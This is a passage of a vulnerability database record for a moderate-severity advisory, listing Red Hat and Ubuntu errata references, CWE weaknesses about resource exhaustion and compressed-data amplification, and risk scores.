reference_url https://github.com/advisories/GHSA-7fc5-f82f-cx69
reference_id GHSA-7fc5-f82f-cx69
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7fc5-f82f-cx69
16
reference_url https://access.redhat.com/errata/RHSA-2025:10217
reference_id RHSA-2025:10217
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:10217
17
reference_url https://access.redhat.com/errata/RHSA-2025:3906
reference_id RHSA-2025:3906
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:3906
18
reference_url https://access.redhat.com/errata/RHSA-2025:4493
reference_id RHSA-2025:4493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:4493
19
reference_url https://access.redhat.com/errata/RHSA-2025:8131
reference_id RHSA-2025:8131
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:8131
20
reference_url https://usn.ubuntu.com/7418-1/
reference_id USN-7418-1
reference_type
scores
url https://usn.ubuntu.com/7418-1/
Weaknesses
0
cwe_id 1287
name Improper Validation of Specified Type of Input
description The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.
1
cwe_id 400
name Uncontrolled Resource Consumption
description The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
2
cwe_id 405
name Asymmetric Resource Consumption (Amplification)
description The product does not properly control situations in which an adversary can cause the product to consume or produce excessive resources without requiring the adversary to invest equivalent work or otherwise prove authorization, i.e., the adversary's influence is asymmetric.
3
cwe_id 409
name Improper Handling of Highly Compressed Data (Data Amplification)
description The product does not handle or incorrectly handles a compressed input with a very high compression ratio that produces a large output.
4
cwe_id 770
name Allocation of Resources Without Limits or Throttling
description The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.
5
cwe_id 789
name Memory Allocation with Excessive Size Value
description The product allocates memory based on an untrusted, large size value, but it does not ensure that the size is within expected limits, allowing arbitrary amounts of memory to be allocated.
6
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
7
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
Exploits
Severity_range_score4.0 - 6.9
Exploitability0.5
Weighted_severity6.2
Risk_score3.1
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-wyjh-cuuy-zbeb